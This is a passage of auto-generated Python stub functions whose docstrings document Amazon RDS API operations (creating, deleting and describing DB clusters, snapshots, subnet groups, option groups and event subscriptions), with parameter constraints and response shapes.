        Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :rtype: dict
    :return: {
        'DBSnapshot': {
            'DBSnapshotIdentifier': 'string',
            'DBInstanceIdentifier': 'string',
            'SnapshotCreateTime': datetime(2015, 1, 1),
            'Engine': 'string',
            'AllocatedStorage': 123,
            'Status': 'string',
            'Port': 123,
            'AvailabilityZone': 'string',
            'VpcId': 'string',
            'InstanceCreateTime': datetime(2015, 1, 1),
            'MasterUsername': 'string',
            'EngineVersion': 'string',
            'LicenseModel': 'string',
            'SnapshotType': 'string',
            'Iops': 123,
            'OptionGroupName': 'string',
            'PercentProgress': 123,
            'SourceRegion': 'string',
            'SourceDBSnapshotIdentifier': 'string',
            'StorageType': 'string',
            'TdeCredentialArn': 'string',
            'Encrypted': True|False,
            'KmsKeyId': 'string',
            'DBSnapshotArn': 'string',
            'Timezone': 'string',
            'IAMDatabaseAuthenticationEnabled': True|False
        }
    }
    :returns:
    CreateDBSnapshot
    DeleteDBSnapshot
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def create_db_subnet_group(DBSubnetGroupName=None, DBSubnetGroupDescription=None, SubnetIds=None, Tags=None):
    """
    Creates a new DB subnet group. DB subnet groups must contain at least one subnet in at least two AZs in the region.
    See also: AWS API Documentation
    Examples
    This example creates a DB subnet group.
    Expected Output:
    :example: response = client.create_db_subnet_group(
        DBSubnetGroupName='string',
        DBSubnetGroupDescription='string',
        SubnetIds=[
            'string',
        ],
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: [REQUIRED]
        The name for the DB subnet group. This value is stored as a lowercase string.
        Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
        Example: mySubnetgroup
    :type DBSubnetGroupDescription: string
    :param DBSubnetGroupDescription: [REQUIRED]
        The description for the DB subnet group.
    :type SubnetIds: list
    :param SubnetIds: [REQUIRED]
        The EC2 Subnet IDs for the DB subnet group.
        (string) --
    :type Tags: list
    :param Tags: A list of tags.
        (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
        Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
        Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :rtype: dict
    :return: {
        'DBSubnetGroup': {
            'DBSubnetGroupName': 'string',
            'DBSubnetGroupDescription': 'string',
            'VpcId': 'string',
            'SubnetGroupStatus': 'string',
            'Subnets': [
                {
                    'SubnetIdentifier': 'string',
                    'SubnetAvailabilityZone': {
                        'Name': 'string'
                    },
                    'SubnetStatus': 'string'
                },
            ],
            'DBSubnetGroupArn': 'string'
        }
    }
    :returns:
    CreateDBSubnetGroup
    ModifyDBSubnetGroup
    DescribeDBSubnetGroups
    DeleteDBSubnetGroup
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def create_event_subscription(SubscriptionName=None, SnsTopicArn=None, SourceType=None, EventCategories=None, SourceIds=None, Enabled=None, Tags=None):
    """
    Creates an RDS event notification subscription. This action requires a topic ARN (Amazon Resource Name) created by either the RDS console, the SNS console, or the SNS API. To obtain an ARN with SNS, you must create a topic in Amazon SNS and subscribe to the topic. The ARN is displayed in the SNS console.
    You can specify the type of source (SourceType) you want to be notified of, provide a list of RDS sources (SourceIds) that triggers the events, and provide a list of event categories (EventCategories) for events you want to be notified of. For example, you can specify SourceType = db-instance, SourceIds = mydbinstance1, mydbinstance2 and EventCategories = Availability, Backup.
    If you specify both the SourceType and SourceIds, such as SourceType = db-instance and SourceIdentifier = myDBInstance1, you will be notified of all the db-instance events for the specified source. If you specify a SourceType but do not specify a SourceIdentifier, you will receive notice of the events for that source type for all your RDS sources. If you do not specify either the SourceType nor the SourceIdentifier, you will be notified of events generated from all RDS sources belonging to your customer account.
    See also: AWS API Documentation
    Examples
    This example creates an event notification subscription.
    Expected Output:
    :example: response = client.create_event_subscription(
        SubscriptionName='string',
        SnsTopicArn='string',
        SourceType='string',
        EventCategories=[
            'string',
        ],
        SourceIds=[
            'string',
        ],
        Enabled=True|False,
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type SubscriptionName: string
    :param SubscriptionName: [REQUIRED]
        The name of the subscription.
        Constraints: The name must be less than 255 characters.
    :type SnsTopicArn: string
    :param SnsTopicArn: [REQUIRED]
        The Amazon Resource Name (ARN) of the SNS topic created for event notification. The ARN is created by Amazon SNS when you create a topic and subscribe to it.
    :type SourceType: string
    :param SourceType: The type of source that will be generating the events. For example, if you want to be notified of events generated by a DB instance, you would set this parameter to db-instance. If this value is not specified, all events are returned.
        Valid values: db-instance | db-cluster | db-parameter-group | db-security-group | db-snapshot | db-cluster-snapshot
    :type EventCategories: list
    :param EventCategories: A list of event categories for a SourceType that you want to subscribe to. You can see a list of the categories for a given SourceType in the Events topic in the Amazon RDS User Guide or by using the DescribeEventCategories action.
        (string) --
    :type SourceIds: list
    :param SourceIds: The list of identifiers of the event sources for which events will be returned. If not specified, then all sources are included in the response. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens; it cannot end with a hyphen or contain two consecutive hyphens.
        Constraints:
        If SourceIds are supplied, SourceType must also be provided.
        If the source type is a DB instance, then a DBInstanceIdentifier must be supplied.
        If the source type is a DB security group, a DBSecurityGroupName must be supplied.
        If the source type is a DB parameter group, a DBParameterGroupName must be supplied.
        If the source type is a DB snapshot, a DBSnapshotIdentifier must be supplied.
        (string) --
    :type Enabled: boolean
    :param Enabled: A Boolean value; set to true to activate the subscription, set to false to create the subscription but not activate it.
    :type Tags: list
    :param Tags: A list of tags.
        (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
        Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
        Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :rtype: dict
    :return: {
        'EventSubscription': {
            'CustomerAwsId': 'string',
            'CustSubscriptionId': 'string',
            'SnsTopicArn': 'string',
            'Status': 'string',
            'SubscriptionCreationTime': 'string',
            'SourceType': 'string',
            'SourceIdsList': [
                'string',
            ],
            'EventCategoriesList': [
                'string',
            ],
            'Enabled': True|False,
            'EventSubscriptionArn': 'string'
        }
    }
    :returns:
    (string) --
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def create_option_group(OptionGroupName=None, EngineName=None, MajorEngineVersion=None, OptionGroupDescription=None, Tags=None):
    """
    Creates a new option group. You can create up to 20 option groups.
    See also: AWS API Documentation
    Examples
    This example creates an option group.
    Expected Output:
    :example: response = client.create_option_group(
        OptionGroupName='string',
        EngineName='string',
        MajorEngineVersion='string',
        OptionGroupDescription='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type OptionGroupName: string
    :param OptionGroupName: [REQUIRED]
        Specifies the name of the option group to be created.
        Constraints:
        Must be 1 to 255 alphanumeric characters or hyphens
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
        Example: myoptiongroup
    :type EngineName: string
    :param EngineName: [REQUIRED]
        Specifies the name of the engine that this option group should be associated with.
    :type MajorEngineVersion: string
    :param MajorEngineVersion: [REQUIRED]
        Specifies the major version of the engine that this option group should be associated with.
    :type OptionGroupDescription: string
    :param OptionGroupDescription: [REQUIRED]
        The description of the option group.
    :type Tags: list
    :param Tags: A list of tags.
        (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
        Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
        Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :rtype: dict
    :return: {
        'OptionGroup': {
            'OptionGroupName': 'string',
            'OptionGroupDescription': 'string',
            'EngineName': 'string',
            'MajorEngineVersion': 'string',
            'Options': [
                {
                    'OptionName': 'string',
                    'OptionDescription': 'string',
                    'Persistent': True|False,
                    'Permanent': True|False,
                    'Port': 123,
                    'OptionVersion': 'string',
                    'OptionSettings': [
                        {
                            'Name': 'string',
                            'Value': 'string',
                            'DefaultValue': 'string',
                            'Description': 'string',
                            'ApplyType': 'string',
                            'DataType': 'string',
                            'AllowedValues': 'string',
                            'IsModifiable': True|False,
                            'IsCollection': True|False
                        },
                    ],
                    'DBSecurityGroupMemberships': [
                        {
                            'DBSecurityGroupName': 'string',
                            'Status': 'string'
                        },
                    ],
                    'VpcSecurityGroupMemberships': [
                        {
                            'VpcSecurityGroupId': 'string',
                            'Status': 'string'
                        },
                    ]
                },
            ],
            'AllowsVpcAndNonVpcInstanceMemberships': True|False,
            'VpcId': 'string',
            'OptionGroupArn': 'string'
        }
    }
    :returns:
    ModifyDBInstance
    RebootDBInstance
    RestoreDBInstanceFromDBSnapshot
    RestoreDBInstanceToPointInTime
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_db_cluster(DBClusterIdentifier=None, SkipFinalSnapshot=None, FinalDBSnapshotIdentifier=None):
    """
    The DeleteDBCluster action deletes a previously provisioned DB cluster. When you delete a DB cluster, all automated backups for that DB cluster are deleted and cannot be recovered. Manual DB cluster snapshots of the specified DB cluster are not deleted.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    This example deletes the specified DB cluster.
    Expected Output:
    :example: response = client.delete_db_cluster(
        DBClusterIdentifier='string',
        SkipFinalSnapshot=True|False,
        FinalDBSnapshotIdentifier='string'
    )
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED]
        The DB cluster identifier for the DB cluster to be deleted. This parameter isn't case-sensitive.
        Constraints:
        Must contain from 1 to 63 alphanumeric characters or hyphens
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
    :type SkipFinalSnapshot: boolean
    :param SkipFinalSnapshot: Determines whether a final DB cluster snapshot is created before the DB cluster is deleted. If true is specified, no DB cluster snapshot is created. If false is specified, a DB cluster snapshot is created before the DB cluster is deleted.
        Note
        You must specify a FinalDBSnapshotIdentifier parameter if SkipFinalSnapshot is false .
        Default: false
    :type FinalDBSnapshotIdentifier: string
    :param FinalDBSnapshotIdentifier: The DB cluster snapshot identifier of the new DB cluster snapshot created when SkipFinalSnapshot is set to false .
        Note
        Specifying this parameter and also setting the SkipFinalSnapshot parameter to true results in an error.
        Constraints:
        Must be 1 to 255 alphanumeric characters
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
    :rtype: dict
    :return: {
        'DBCluster': {
            'AllocatedStorage': 123,
            'AvailabilityZones': [
                'string',
            ],
            'BackupRetentionPeriod': 123,
            'CharacterSetName': 'string',
            'DatabaseName': 'string',
            'DBClusterIdentifier': 'string',
            'DBClusterParameterGroup': 'string',
            'DBSubnetGroup': 'string',
            'Status': 'string',
            'PercentProgress': 'string',
            'EarliestRestorableTime': datetime(2015, 1, 1),
            'Endpoint': 'string',
            'ReaderEndpoint': 'string',
            'MultiAZ': True|False,
            'Engine': 'string',
            'EngineVersion': 'string',
            'LatestRestorableTime': datetime(2015, 1, 1),
            'Port': 123,
            'MasterUsername': 'string',
            'DBClusterOptionGroupMemberships': [
                {
                    'DBClusterOptionGroupName': 'string',
                    'Status': 'string'
                },
            ],
            'PreferredBackupWindow': 'string',
            'PreferredMaintenanceWindow': 'string',
            'ReplicationSourceIdentifier': 'string',
            'ReadReplicaIdentifiers': [
                'string',
            ],
            'DBClusterMembers': [
                {
                    'DBInstanceIdentifier': 'string',
                    'IsClusterWriter': True|False,
                    'DBClusterParameterGroupStatus': 'string',
                    'PromotionTier': 123
                },
            ],
            'VpcSecurityGroups': [
                {
                    'VpcSecurityGroupId': 'string',
                    'Status': 'string'
                },
            ],
            'HostedZoneId': 'string',
            'StorageEncrypted': True|False,
            'KmsKeyId': 'string',
            'DbClusterResourceId': 'string',
            'DBClusterArn': 'string',
            'AssociatedRoles': [
                {
                    'RoleArn': 'string',
                    'Status': 'string'
                },
            ],
            'IAMDatabaseAuthenticationEnabled': True|False,
            'ClusterCreateTime': datetime(2015, 1, 1)
        }
    }
    :returns:
    CreateDBCluster
    DeleteDBCluster
    FailoverDBCluster
    ModifyDBCluster
    RestoreDBClusterFromSnapshot
    RestoreDBClusterToPointInTime
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_db_cluster_parameter_group(DBClusterParameterGroupName=None):
    """
    Deletes a specified DB cluster parameter group. The DB cluster parameter group to be deleted cannot be associated with any DB clusters.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    This example deletes the specified DB cluster parameter group.
    Expected Output:
    :example: response = client.delete_db_cluster_parameter_group(
        DBClusterParameterGroupName='string'
    )
    :type DBClusterParameterGroupName: string
    :param DBClusterParameterGroupName: [REQUIRED]
        The name of the DB cluster parameter group.
        Constraints:
        Must be the name of an existing DB cluster parameter group.
        You cannot delete a default DB cluster parameter group.
        Cannot be associated with any DB clusters.
    :return: response = client.delete_db_cluster_parameter_group(
        DBClusterParameterGroupName='mydbclusterparametergroup',
    )
    print(response)
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_db_cluster_snapshot(DBClusterSnapshotIdentifier=None):
    """
    Deletes a DB cluster snapshot. If the snapshot is being copied, the copy operation is terminated.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    This example deletes the specified DB cluster snapshot.
    Expected Output:
    :example: response = client.delete_db_cluster_snapshot(
        DBClusterSnapshotIdentifier='string'
    )
    :type DBClusterSnapshotIdentifier: string
    :param DBClusterSnapshotIdentifier: [REQUIRED]
        The identifier of the DB cluster snapshot to delete.
        Constraints: Must be the name of an existing DB cluster snapshot in the available state.
    :rtype: dict
    :return: {
        'DBClusterSnapshot': {
            'AvailabilityZones': [
                'string',
            ],
            'DBClusterSnapshotIdentifier': 'string',
            'DBClusterIdentifier': 'string',
            'SnapshotCreateTime': datetime(2015, 1, 1),
            'Engine': 'string',
            'AllocatedStorage': 123,
            'Status': 'string',
            'Port': 123,
            'VpcId': 'string',
            'ClusterCreateTime': datetime(2015, 1, 1),
            'MasterUsername': 'string',
            'EngineVersion': 'string',
            'LicenseModel': 'string',
            'SnapshotType': 'string',
            'PercentProgress': 123,
            'StorageEncrypted': True|False,
            'KmsKeyId': 'string',
            'DBClusterSnapshotArn': 'string',
            'SourceDBClusterSnapshotArn': 'string',
            'IAMDatabaseAuthenticationEnabled': True|False
        }
    }
    :returns:
    (string) --
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_db_instance(DBInstanceIdentifier=None, SkipFinalSnapshot=None, FinalDBSnapshotIdentifier=None):
    """
    The DeleteDBInstance action deletes a previously provisioned DB instance. When you delete a DB instance, all automated backups for that instance are deleted and cannot be recovered. Manual DB snapshots of the DB instance to be deleted by DeleteDBInstance are not deleted.
    If you request a final DB snapshot the status of the Amazon RDS DB instance is deleting until the DB snapshot is created. The API action DescribeDBInstance is used to monitor the status of this operation. The action cannot be canceled or reverted once submitted.
    Note that when a DB instance is in a failure state and has a status of failed , incompatible-restore , or incompatible-network , you can only delete it when the SkipFinalSnapshot parameter is set to true .
    If the specified DB instance is part of an Amazon Aurora DB cluster, you cannot delete the DB instance if the following are true:
    To delete a DB instance in this case, first call the PromoteReadReplicaDBCluster API action to promote the DB cluster so it's no longer a Read Replica. After the promotion completes, then call the DeleteDBInstance API action to delete the final instance in the DB cluster.
    See also: AWS API Documentation
    Examples
    This example deletes the specified DB instance.
    Expected Output:
    :example: response = client.delete_db_instance(
        DBInstanceIdentifier='string',
        SkipFinalSnapshot=True|False,
        FinalDBSnapshotIdentifier='string'
    )
    :type DBInstanceIdentifier: string
    :param DBInstanceIdentifier: [REQUIRED]
        The DB instance identifier for the DB instance to be deleted. This parameter isn't case-sensitive.
        Constraints:
        Must contain from 1 to 63 alphanumeric characters or hyphens
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
    :type SkipFinalSnapshot: boolean
    :param SkipFinalSnapshot: Determines whether a final DB snapshot is created before the DB instance is deleted. If true is specified, no DBSnapshot is created. If false is specified, a DB snapshot is created before the DB instance is deleted.
        Note that when a DB instance is in a failure state and has a status of 'failed', 'incompatible-restore', or 'incompatible-network', it can only be deleted when the SkipFinalSnapshot parameter is set to 'true'.
        Specify true when deleting a Read Replica.
        Note
        The FinalDBSnapshotIdentifier parameter must be specified if SkipFinalSnapshot is false .
        Default: false
    :type FinalDBSnapshotIdentifier: string
    :param FinalDBSnapshotIdentifier: The DBSnapshotIdentifier of the new DBSnapshot created when SkipFinalSnapshot is set to false .
        Note
        Specifying this parameter and also setting the SkipFinalSnapshot parameter to true results in an error.
        Constraints:
        Must be 1 to 255 alphanumeric characters
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
        Cannot be specified when deleting a Read Replica.
    :rtype: dict
    :return: {
        'DBInstance': {
            'DBInstanceIdentifier': 'string',
            'DBInstanceClass': 'string',
            'Engine': 'string',
            'DBInstanceStatus': 'string',
            'MasterUsername': 'string',
            'DBName': 'string',
            'Endpoint': {
                'Address': 'string',
                'Port': 123,
                'HostedZoneId': 'string'
            },
            'AllocatedStorage': 123,
            'InstanceCreateTime': datetime(2015, 1, 1),
            'PreferredBackupWindow': 'string',
            'BackupRetentionPeriod': 123,
            'DBSecurityGroups': [
                {
                    'DBSecurityGroupName': 'string',
                    'Status': 'string'
                },
            ],
            'VpcSecurityGroups': [
                {
                    'VpcSecurityGroupId': 'string',
                    'Status': 'string'
                },
            ],
            'DBParameterGroups': [
                {
                    'DBParameterGroupName': 'string',
                    'ParameterApplyStatus': 'string'
                },
            ],
            'AvailabilityZone': 'string',
            'DBSubnetGroup': {
                'DBSubnetGroupName': 'string',
                'DBSubnetGroupDescription': 'string',
                'VpcId': 'string',
                'SubnetGroupStatus': 'string',
                'Subnets': [
                    {
                        'SubnetIdentifier': 'string',
                        'SubnetAvailabilityZone': {
                            'Name': 'string'
                        },
                        'SubnetStatus': 'string'
                    },
                ],
                'DBSubnetGroupArn': 'string'
            },
            'PreferredMaintenanceWindow': 'string',
            'PendingModifiedValues': {
                'DBInstanceClass': 'string',
                'AllocatedStorage': 123,
                'MasterUserPassword': 'string',
                'Port': 123,
                'BackupRetentionPeriod': 123,
                'MultiAZ': True|False,
                'EngineVersion': 'string',
                'LicenseModel': 'string',
                'Iops': 123,
                'DBInstanceIdentifier': 'string',
                'StorageType': 'string',
                'CACertificateIdentifier': 'string',
                'DBSubnetGroupName': 'string'
            },
            'LatestRestorableTime': datetime(2015, 1, 1),
            'MultiAZ': True|False,
            'EngineVersion': 'string',
            'AutoMinorVersionUpgrade': True|False,
            'ReadReplicaSourceDBInstanceIdentifier': 'string',
            'ReadReplicaDBInstanceIdentifiers': [
                'string',
            ],
            'ReadReplicaDBClusterIdentifiers': [
                'string',
            ],
            'LicenseModel': 'string',
            'Iops': 123,
            'OptionGroupMemberships': [
                {
                    'OptionGroupName': 'string',
                    'Status': 'string'
                },
            ],
            'CharacterSetName': 'string',
            'SecondaryAvailabilityZone': 'string',
            'PubliclyAccessible': True|False,
            'StatusInfos': [
                {
                    'StatusType': 'string',
                    'Normal': True|False,
                    'Status': 'string',
                    'Message': 'string'
                },
            ],
            'StorageType': 'string',
            'TdeCredentialArn': 'string',
            'DbInstancePort': 123,
            'DBClusterIdentifier': 'string',
            'StorageEncrypted': True|False,
            'KmsKeyId': 'string',
            'DbiResourceId': 'string',
            'CACertificateIdentifier': 'string',
            'DomainMemberships': [
                {
                    'Domain': 'string',
                    'Status': 'string',
                    'FQDN': 'string',
                    'IAMRoleName': 'string'
                },
            ],
            'CopyTagsToSnapshot': True|False,
            'MonitoringInterval': 123,
            'EnhancedMonitoringResourceArn': 'string',
            'MonitoringRoleArn': 'string',
            'PromotionTier': 123,
            'DBInstanceArn': 'string',
            'Timezone': 'string',
            'IAMDatabaseAuthenticationEnabled': True|False
        }
    }
    :returns:
    DBInstanceIdentifier (string) -- [REQUIRED]
    The DB instance identifier for the DB instance to be deleted. This parameter isn't case-sensitive.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    SkipFinalSnapshot (boolean) -- Determines whether a final DB snapshot is created before the DB instance is deleted. If true is specified, no DBSnapshot is created. If false is specified, a DB snapshot is created before the DB instance is deleted.
    Note that when a DB instance is in a failure state and has a status of 'failed', 'incompatible-restore', or 'incompatible-network', it can only be deleted when the SkipFinalSnapshot parameter is set to 'true'.
    Specify true when deleting a Read Replica.
    Note
    The FinalDBSnapshotIdentifier parameter must be specified if SkipFinalSnapshot is false .
    Default: false
    FinalDBSnapshotIdentifier (string) -- The DBSnapshotIdentifier of the new DBSnapshot created when SkipFinalSnapshot is set to false .
    Note
    Specifying this parameter and also setting the SkipFinalSnapshot parameter to true results in an error.
    Constraints:
    Must be 1 to 255 alphanumeric characters
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    Cannot be specified when deleting a Read Replica.
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_db_parameter_group(DBParameterGroupName=None):
    """
    Deletes a specified DBParameterGroup. The DBParameterGroup to be deleted cannot be associated with any DB instances.
    See also: AWS API Documentation
    Examples
    The following example deletes a DB parameter group.
    Expected Output:
    :example: response = client.delete_db_parameter_group(
        DBParameterGroupName='string'
    )
    :type DBParameterGroupName: string
    :param DBParameterGroupName: [REQUIRED]
        The name of the DB parameter group.
        Constraints:
        Must be the name of an existing DB parameter group
        You cannot delete a default DB parameter group
        Cannot be associated with any DB instances
    :return: response = client.delete_db_parameter_group(
        DBParameterGroupName='mydbparamgroup3',
    )
    print(response)
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_db_security_group(DBSecurityGroupName=None):
    """
    Deletes a DB security group.
    See also: AWS API Documentation
    Examples
    The following example deletes a DB security group.
    Expected Output:
    :example: response = client.delete_db_security_group(
        DBSecurityGroupName='string'
    )
    :type DBSecurityGroupName: string
    :param DBSecurityGroupName: [REQUIRED]
        The name of the DB security group to delete.
        Note
        You cannot delete the default DB security group.
        Constraints:
        Must be 1 to 255 alphanumeric characters
        First character must be a letter
        Cannot end with a hyphen or contain two consecutive hyphens
        Must not be 'Default'
    :return: response = client.delete_db_security_group(
        DBSecurityGroupName='mysecgroup',
    )
    print(response)
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_db_snapshot(DBSnapshotIdentifier=None):
    """
    Deletes a DBSnapshot. If the snapshot is being copied, the copy operation is terminated.
    See also: AWS API Documentation
    Examples
    This example deletes the specified DB snapshot.
    Expected Output:
    :example: response = client.delete_db_snapshot(
        DBSnapshotIdentifier='string'
    )
    :type DBSnapshotIdentifier: string
    :param DBSnapshotIdentifier: [REQUIRED]
        The DBSnapshot identifier.
        Constraints: Must be the name of an existing DB snapshot in the available state.
    :rtype: dict
    :return: {
        'DBSnapshot': {
            'DBSnapshotIdentifier': 'string',
            'DBInstanceIdentifier': 'string',
            'SnapshotCreateTime': datetime(2015, 1, 1),
            'Engine': 'string',
            'AllocatedStorage': 123,
            'Status': 'string',
            'Port': 123,
            'AvailabilityZone': 'string',
            'VpcId': 'string',
            'InstanceCreateTime': datetime(2015, 1, 1),
            'MasterUsername': 'string',
            'EngineVersion': 'string',
            'LicenseModel': 'string',
            'SnapshotType': 'string',
            'Iops': 123,
            'OptionGroupName': 'string',
            'PercentProgress': 123,
            'SourceRegion': 'string',
            'SourceDBSnapshotIdentifier': 'string',
            'StorageType': 'string',
            'TdeCredentialArn': 'string',
            'Encrypted': True|False,
            'KmsKeyId': 'string',
            'DBSnapshotArn': 'string',
            'Timezone': 'string',
            'IAMDatabaseAuthenticationEnabled': True|False
        }
    }
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_db_subnet_group(DBSubnetGroupName=None):
    """
    Deletes a DB subnet group.
    See also: AWS API Documentation
    Examples
    This example deletes the specified DB subnet group.
    Expected Output:
    :example: response = client.delete_db_subnet_group(
        DBSubnetGroupName='string'
    )
    :type DBSubnetGroupName: string
    :param DBSubnetGroupName: [REQUIRED]
        The name of the database subnet group to delete.
        Note
        You cannot delete the default subnet group.
        Constraints:
        Constraints: Must contain no more than 255 alphanumeric characters, periods, underscores, spaces, or hyphens. Must not be default.
        Example: mySubnetgroup
    :return: response = client.delete_db_subnet_group(
        DBSubnetGroupName='mydbsubnetgroup',
    )
    print(response)
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_event_subscription(SubscriptionName=None):
    """
    Deletes an RDS event notification subscription.
    See also: AWS API Documentation
    Examples
    This example deletes the specified DB event subscription.
    Expected Output:
    :example: response = client.delete_event_subscription(
        SubscriptionName='string'
    )
    :type SubscriptionName: string
    :param SubscriptionName: [REQUIRED]
        The name of the RDS event notification subscription you want to delete.
    :rtype: dict
    :return: {
        'EventSubscription': {
            'CustomerAwsId': 'string',
            'CustSubscriptionId': 'string',
            'SnsTopicArn': 'string',
            'Status': 'string',
            'SubscriptionCreationTime': 'string',
            'SourceType': 'string',
            'SourceIdsList': [
                'string',
            ],
            'EventCategoriesList': [
                'string',
            ],
            'Enabled': True|False,
            'EventSubscriptionArn': 'string'
        }
    }
    :returns:
    (string) --
    """
    # Generated stub: documentation only, no client call is made here.
    pass
def delete_option_group(OptionGroupName=None):
    """
    Deletes an existing option group.
    See also: AWS API Documentation
    Examples
    This example deletes the specified option group.
    Expected Output:
    :example: response = client.delete_option_group(
    OptionGroupName='string'
    )
    :type OptionGroupName: string
    :param OptionGroupName: [REQUIRED]
    The name of the option group to be deleted.
    Note
    You cannot delete default option groups.
    :return: response = client.delete_option_group(
    OptionGroupName='mydboptiongroup',
    )
    print(response)
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_account_attributes():
    """
    Lists all of the attributes for a customer account. The attributes include Amazon RDS quotas for the account, such as the number of DB instances allowed. The description for a quota includes the quota name, current usage toward that quota, and the quota's maximum value.
    This command does not take any parameters.
    See also: AWS API Documentation
    Examples
    This example lists account attributes.
    Expected Output:
    :example: response = client.describe_account_attributes()
    :rtype: dict
    :return: {
    'AccountQuotas': [
    {
    'AccountQuotaName': 'string',
    'Used': 123,
    'Max': 123
    },
    ]
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_certificates(CertificateIdentifier=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Lists the set of CA certificates provided by Amazon RDS for this AWS account.
    See also: AWS API Documentation
    Examples
    This example lists up to 20 certificates for the specified certificate identifier.
    Expected Output:
    :example: response = client.describe_certificates(
    CertificateIdentifier='string',
    Filters=[
    {
    'Name': 'string',
    'Values': [
    'string',
    ]
    },
    ],
    MaxRecords=123,
    Marker='string'
    )
    :type CertificateIdentifier: string
    :param CertificateIdentifier: The user-supplied certificate identifier. If this parameter is specified, information for only the identified certificate is returned. This parameter isn't case-sensitive.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    :type Filters: list
    :param Filters: This parameter is not currently supported.
    (dict) --This type is not currently supported.
    Name (string) -- [REQUIRED]This parameter is not currently supported.
    Values (list) -- [REQUIRED]This parameter is not currently supported.
    (string) --
    :type MaxRecords: integer
    :param MaxRecords: The maximum number of records to include in the response. If more records exist than the specified MaxRecords value, a pagination token called a marker is included in the response so that the remaining results can be retrieved.
    Default: 100
    Constraints: Minimum 20, maximum 100.
    :type Marker: string
    :param Marker: An optional pagination token provided by a previous DescribeCertificates request. If this parameter is specified, the response includes only records beyond the marker, up to the value specified by MaxRecords .
    :rtype: dict
    :return: {
    'Certificates': [
    {
    'CertificateIdentifier': 'string',
    'CertificateType': 'string',
    'Thumbprint': 'string',
    'ValidFrom': datetime(2015, 1, 1),
    'ValidTill': datetime(2015, 1, 1),
    'CertificateArn': 'string'
    },
    ],
    'Marker': 'string'
    }
    """
    # Stub: documentation-only placeholder; the docstring records the request/response shape.
    pass
def describe_db_cluster_parameter_groups(DBClusterParameterGroupName=None, Filters=None, MaxRecords=None, Marker=None):
    """
    Returns a list of DBClusterParameterGroup descriptions. If a DBClusterParameterGroupName parameter is specified, the list will contain only the description of the specified DB cluster parameter group.
